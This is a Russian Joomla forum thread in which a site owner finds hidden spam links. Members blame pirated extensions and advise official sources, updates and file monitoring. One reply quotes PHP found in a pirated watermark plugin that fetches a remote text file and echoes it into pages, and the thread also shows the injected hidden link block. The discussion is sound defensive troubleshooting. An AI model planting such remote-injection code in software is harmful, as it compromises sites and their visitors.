Форум русской поддержки Joomla!® CMS
28.07.2017, 19:04:51 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Основной курс по Joomla
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Появился левый текст на сайте

 (Прочитано 472 раз)
0 Пользователей и 1 Гость смотрят эту тему.
vipopo
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« : 22.03.2017, 16:16:54 »

Заметили на сайте левый текст

<div style="/* position: absolute; *//* top: -1000px; */">
Калькулятор расчета пеноблоков смотрите <a href="http://fortstroi.com.ua/stroitelstvo/stati/item/2003-raschet-kolichestva-penoblokov-online-kalkulyator">на этом ресурсе</a><br>
Все о каркасном доме можно найти здесь <a href="http://stroidom-shop.ru/svoimi-rukami/karkasnyiy-dom-6x6.html">http://stroidom-shop.ru</a><br>
Что лучше инжектор или карбюратор? Подробнее на странице <a href="http://kamael.com.ua/1/sovety-avtomobilistam/327-inzhektor-ili-karbyurator-chto-luchshe">http://kamael.com.ua</a>
</div>

откуда появился я не понимаю. в шаблоне нет такого текста.
Помогите разобраться !

Посмотрела на многих сайтах сделанных на Joomla такой текст присутсствует
Записан
wishlight
Профи
********

Репутация: +221/-1
Offline Offline

Пол: Мужской
Сообщений: 3775


skype aqaus.com


« Ответ #1 : 22.03.2017, 16:21:34 »

Вы расширения ставили с официальных источников?
Записан
dmitry_stas
Профи
********

Репутация: +926/-6
Offline Offline

Сообщений: 9812



« Ответ #2 : 22.03.2017, 16:38:53 »

Посмотрела на многих сайтах сделанных на Joomla такой текст присутсствует
опять Joomla виновата Azn ох уж эта Joomla Azn

Вы расширения ставили с официальных источников?
если бы хотя бы все пытались сначала разобраться, где же они, эти официальные источники... а то встретился - надо качать срочно, пока есть. потом же не будет Azn а что это, откуда, что внутри... кто об этом думает? Azn
Записан
vipopo
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #3 : 22.03.2017, 16:50:53 »

Вы расширения ставили с официальных источников?

я не помню ) я даже не заметила когда это появилось
Записан
SeBun
Практически профи
*******

Репутация: +184/-5
Offline Offline

Пол: Мужской
Сообщений: 3158


@SeBun48


« Ответ #4 : 22.03.2017, 17:00:47 »

откуда появился я не понимаю. в шаблоне нет такого текста.
Помогите разобраться !
Обычно появлется после запуска сайта, может через какое то время, не сразу. Почему, читайте здесь: Не используйте варез!

В двух словах - когда вы качаете расширения с разных варезников, новомодных складчин и т.д., в них присутствует такой код. Он дает возможность третьим лицам зарабатывать на вашем сайте. В шаблоне он или еще где, данный код надежно спрятан. И теперь вам придется либо лечить сайт, либо забить и дальше пользоваться халявкой. Бесплатный сыр, он такой... Сначала сладкий, а потом - диарея.
Записан
dmitry_stas
Профи
********

Репутация: +926/-6
Offline Offline

Сообщений: 9812



« Ответ #5 : 22.03.2017, 17:50:33 »

теперь вам придется либо лечить сайт, либо забить и дальше пользоваться халявкой
ага. а забить на это - это значит и на сайт забить. потому что он с поисковиков вывалится с таким содержанием, и толку с него будет... Azn

я не помню ) я даже не заметила когда это появилось
вы же по улице идете - всякую гадость не подымаете? или тоже все тяните по карманам, авось пригодится? Azn нельзя же так... теперь вот деньги платить, лечить...
Записан
voland
Профи
********

Репутация: +518/-98
Offline Offline

Пол: Мужской
Сообщений: 9847


СКАЙП утерян! Пишите в телеграм @volandku


« Ответ #6 : 22.03.2017, 17:58:38 »

вы же по улице идете - всякую гадость не подымаете? или тоже все тяните по карманам, авось пригодится? Azn нельзя же так... теперь вот деньги платить, лечить...
Кто ж знает...
IT-бомж, может
Записан
vipopo
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #7 : 23.03.2017, 09:48:29 »

Вот какие умники тут взялись, нет что бы помочь новичку, вы всякую фигню пишите. вы наверно сразу как родились стали такими умными!
Записан
ChaosHead
Профи
********

Репутация: +409/-12
Offline Offline

Пол: Мужской
Сообщений: 4744



« Ответ #8 : 23.03.2017, 10:29:51 »

Вы не представляете количество людей, которое тут выстроится так-же на халяву лечить сайты, а потом снова пойдёт качать шаблончик откуда-нибудь там. Но им помочь не смогут, т.к. нет волшебного антивируса, всё чистящего. Это нужно с красными глазами залазить на несколько часов и пересматривать кучу файлов, сравнивать с чистой Joomla и чистыми расширениями, проверять шаблон и не факт, что с первого раза найдешь всё, а зараза расползается по новой. А она там впихнута не просто текстом, они там её и шифруют и скриптами подгружают, чего только не выдумывают. В общем всё сделали для того, чтобы новичку ни в жизнь было самому не разобраться и профи тоже помучился. Поэтому и остаётся только поучать народ.
Есть только один лёгкий способ - это стереть сайт и восстановить резервную копию, которую вы сделали до того, как подцепили эту штуку.
« Последнее редактирование: 23.03.2017, 10:35:19 от ChaosHead » Записан
SeBun
Практически профи
*******

Репутация: +184/-5
Offline Offline

Пол: Мужской
Сообщений: 3158


@SeBun48


« Ответ #9 : 23.03.2017, 11:10:13 »

Вот какие умники тут взялись, нет что бы помочь новичку, вы всякую фигню пишите. вы наверно сразу как родились стали такими умными!
Мы вам и стараемся помочь, отвечая на ваши вопросы и детально разжовывая возникшую у вас ситуацию. Теперь вы знаете ответы на вопросы "почему", "откуда", "зачем" и "что делать". Собственно это все, что мы можем для вас в данной ситуации сделать. Хотите удалить гадость с сайта? Придется платить либо делать сайт заново, как сказал ChaosHead, ибо нет такого антивируса, способного анализировать код, нужен даже не знаток PHP, а специалист, знающий, что именно нужно искать.

Есть только один лёгкий способ - это стереть сайт и восстановить резервную копию, которую вы сделали до того, как подцепили эту штуку.
И то не факт.
Записан
dmitry_stas
Профи
********

Репутация: +926/-6
Offline Offline

Сообщений: 9812



« Ответ #10 : 23.03.2017, 11:34:27 »

Вот какие умники тут взялись, нет что бы помочь новичку, вы всякую фигню пишите. вы наверно сразу как родились стали такими умными!
само собой нет. невозможно к сожалению родится сразу такими умными. сначала были тупые. а потом начали читать всякую фигню, что другие пишут, и стали умными Azn и у вас получится, если захотите, я уверен. только реакция должна быть другая - не губы надутые, а выводы правильные. и все получится Azn

а по поводу помочь - к сожалению вам тут ничем не поможешь более, кроме как указать путь в коммерческий раздел. потому что сами вы сайт все равно не вылечите. ну или как уже сказали полностью удаляйте его, и делайте заново, на расширениях скачанных только с официальных источников
Записан
vipopo
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #11 : 23.03.2017, 11:48:51 »

только реакция должна быть другая - не губы надутые, а выводы правильные. и все получится Azn

Ну как раз я губы надула, и сделала выводы. Но ведь дело сделано и надо искать решения.

Написала, подумала вдруг умный человек уже решал такую проблему! А вы сразу думать надо было! Вот натворила делов, и думаю.
Записан
Septdir
Практически профи
*******

Репутация: +98/-3
Offline Offline

Пол: Мужской
Сообщений: 2009


Skype: septdir


« Ответ #12 : 23.03.2017, 13:09:54 »

Ну как раз я губы надула, и сделала выводы. Но ведь дело сделано и надо искать решения.

Написала, подумала вдруг умный человек уже решал такую проблему! А вы сразу думать надо было! Вот натворила делов, и думаю.
На самом деле, вы не одна такая, не скажу что большинство, но многие на эти грабли наступали. Что же до решения, то у новичка их три.
1. Обратиться к специалисту. За относительно не маленькую сумму, вам сайт почистят (скупой платит дважды)
2. Стереть сайт и создать заного. На самом деле даже специалист может прийти к такому выводу ибо иногда проще сайт пересобрать чем пытаться вычистить. (откат от бэкапа не всегда выход ибо, как я понял вы не знаете что именно привело к заражению)
3. Научиться, вариант конечно самый лучший, но чтобы этому научиться мало выучить языки программирования, надо знать специфику + всегда быть в "тренде", а на это могут уйти годы.

Так что если время, силы и знания позволяют, то самый эконом вариант пересобрать сайт целиком. Ну и выучить простейшие правила.
1. Ни каких варезов. Поймите ломать винду и раздавать ее нахалву народу - это хобби. А варез для сайтов - это бизнес.
2. На всегда должны быть акт ильные версии дивжка и расширений.
3. Обновляться быстро. Иногда уже через час, а то и меньше после выхода обновления  начинают бить по уязвимости.
4. Всегда следить за сайтом. в частности за изменениями в файлах. Поймав момент заражения, устранить причину и последствия куда легче.
Ну вот как-то так.
Записан
SeBun
Практически профи
*******

Репутация: +184/-5
Offline Offline

Пол: Мужской
Сообщений: 3158


@SeBun48


« Ответ #13 : 23.03.2017, 14:33:10 »

3. Научиться
Я только через 6 лет примерно начал понимать PHP (не говоря о знаниях касательно взлома, они пришли позднее), вы хотите, что бы она научилась сама чистить сайт? И все ради одного сайта?
Записан
vipopo
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #14 : 23.03.2017, 14:56:20 »

Вообщем у меня получилось, методом удаления всякий ненужной фигни! почистила сайт, и этого кода нет.

Спасибо за советы, теперь буду думать что скачивать.
Записан
Septdir
Практически профи
*******

Репутация: +98/-3
Offline Offline

Пол: Мужской
Сообщений: 2009


Skype: septdir


« Ответ #15 : 23.03.2017, 18:49:34 »

Я только через 6 лет примерно начал понимать PHP (не говоря о знаниях касательно взлома, они пришли позднее), вы хотите, что бы она научилась сама чистить сайт? И все ради одного сайта?
Ну я php для одного сайта изучал=)
Вообщем у меня получилось, методом удаления всякий ненужной фигни! почистила сайт, и этого кода нет.

Спасибо за советы, теперь буду думать что скачивать.

Только причину вы не убрали =)
Записан
dmitry_stas
Профи
********

Репутация: +926/-6
Offline Offline

Сообщений: 9812



« Ответ #16 : 23.03.2017, 19:26:40 »

Только причину вы не убрали =)
99% что так и есть. убрано следствие, но не причина. через время все будет точно также, как и было. хотя конечно маленький шанс, что были только ссылки и ничего больше, все же остается Azn
Записан
vipopo
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #17 : 24.03.2017, 10:17:24 »

Я надеюсь эту гадость я удалила=) но буду наблюдать еще.  На сегодня пока еще нет ))
Записан
SeBun
Практически профи
*******

Репутация: +184/-5
Offline Offline

Пол: Мужской
Сообщений: 3158


@SeBun48


« Ответ #18 : 24.03.2017, 13:20:10 »

Я надеюсь эту гадость я удалила=) но буду наблюдать еще.  На сегодня пока еще нет ))
Представьте, что вы покупаете сливу (по аналогии постановки из Уральских пельменей). Вы увидели, что в магазине акция - сливы за четверть цены продают. И купили ровно одну штуку. Вы намеревались ее съесть. Но когда вы стояли на кассе, за вами выстроилась очередь, а у кассира кончилась лента в терминале, да и сливу вы взвесили неправильно, а очередь ругается. И вот кассир под давлением обстоятельств предлагает вам эту сливу съесть. Все соглашаются. И в момент, когда вы от сливы остается только косточка, вы обнаруживаете в ней дырочку. Опа! - думаете вы, червячок. Вы спрашиваете у толпы - "Народ, как удалить червячка"? Вам умный дядечка говорит, что надо вскрывать желудок и чистить. Вы же решаете, что дядечка преувеличивает и будет лучше дома поставить клизму и решить все проблемы. Использовав нехитрый инструмент вы проводите процедуру и видите среди эм...всего прочего... мертвого червячка. Вашему ликованию нет предела! А между тем, в желудке медленно разлагается штрихкод, который был приклеен на сливу, выделяя токсичные вещества, а ДНК уже начали мутацию под воздействием ГМО...

Вот примерно то, что происходит с вашим сайтом. Никто не знает, что там внутри. И обычно одной строчкой кода, которая выводит видимую ссылку, дело не ограничивается.
Записан
dmitry_stas
Профи
********

Репутация: +926/-6
Offline Offline

Сообщений: 9812



« Ответ #19 : 24.03.2017, 14:01:05 »

ого... я тоже хочу... Azn
Записан
vipopo
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 9


« Ответ #20 : 24.03.2017, 14:13:24 »

я все таки надеюсь на лучшее  Roll Eyes
Записан
Septdir
Практически профи
*******

Репутация: +98/-3
Offline Offline

Пол: Мужской
Сообщений: 2009


Skype: septdir


« Ответ #21 : 24.03.2017, 19:36:47 »

Представьте, что вы покупаете сливу (по аналогии постановки из Уральских пельменей). Вы увидели, что в магазине акция - сливы за четверть цены продают. И купили ровно одну штуку. Вы намеревались ее съесть. Но когда вы стояли на кассе, за вами выстроилась очередь, а у кассира кончилась лента в терминале, да и сливу вы взвесили неправильно, а очередь ругается. И вот кассир под давлением обстоятельств предлагает вам эту сливу съесть. Все соглашаются. И в момент, когда вы от сливы остается только косточка, вы обнаруживаете в ней дырочку. Опа! - думаете вы, червячок. Вы спрашиваете у толпы - "Народ, как удалить червячка"? Вам умный дядечка говорит, что надо вскрывать желудок и чистить. Вы же решаете, что дядечка преувеличивает и будет лучше дома поставить клизму и решить все проблемы. Использовав нехитрый инструмент вы проводите процедуру и видите среди эм...всего прочего... мертвого червячка. Вашему ликованию нет предела! А между тем, в желудке медленно разлагается штрихкод, который был приклеен на сливу, выделяя токсичные вещества, а ДНК уже начали мутацию под воздействием ГМО...

Вот примерно то, что происходит с вашим сайтом. Никто не знает, что там внутри. И обычно одной строчкой кода, которая выводит видимую ссылку, дело не ограничивается.
А я думал червичок личинки отложил =)
Записан
Bowa
Давно я тут
****

Репутация: +5/-0
Offline Offline

Сообщений: 364



« Ответ #22 : 29.06.2017, 14:44:16 »

Нашел эту гадость в плагине для Watermar под Joomla
Вот источник: http://jom.su/watermark-vodyanoie-znak-dlya-kartinok-na-saieti-joomla-3.x.html
в вайле плагина sc_jcms.php
в самом низу есть такой код обращения к текстовому файлу
Код:
<?php
$files = 'http://ciba.com.ua/a.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://ciba.com.ua/a.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;
 }
?>
Вот он эту гадость и тащит в Joomla
Записан
dmitry_stas
Профи
********

Репутация: +926/-6
Offline Offline

Сообщений: 9812



« Ответ #23 : 30.06.2017, 08:25:20 »

это есть именно в исходнике, или уже у вас на сайте?
Записан
voland
Профи
********

Репутация: +518/-98
Offline Offline

Пол: Мужской
Сообщений: 9847


СКАЙП утерян! Пишите в телеграм @volandku


« Ответ #24 : 30.06.2017, 09:08:59 »

Нашел эту гадость в плагине для Watermar под Joomla
Вот источник: http://jom.su/watermark-vodyanoie-znak-dlya-kartinok-na-saieti-joomla-3.x.html
в вайле плагина sc_jcms.php
в самом низу есть такой код обращения к текстовому файлу
Код:
<?php
$files = 'http://ciba.com.ua/a.txt';
$file_headers = @get_headers($files);
if($file_headers[0] == 'HTTP/1.1 200 OK')
 {
$url = "http://ciba.com.ua/a.txt";
$c = @file_get_contents($url);
$array_double=explode(',',$c);
$array_one=array_unique($array_double);
$result=implode(',',$array_one);
echo $result;
 }
?>
Вот он эту гадость и тащит в Joomla
Логично. Скачано же с варезника!
Обсуждение вареза запрещено!
Записан
dmitry_stas
Профи
********

Репутация: +926/-6
Offline Offline

Сообщений: 9812



« Ответ #25 : 30.06.2017, 14:52:52 »

а, понятно. не заходил на сам сайт, не видел что это варезник. ну тогда да, все логично. тогда там может и не только это. и уже может и не только там Azn
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet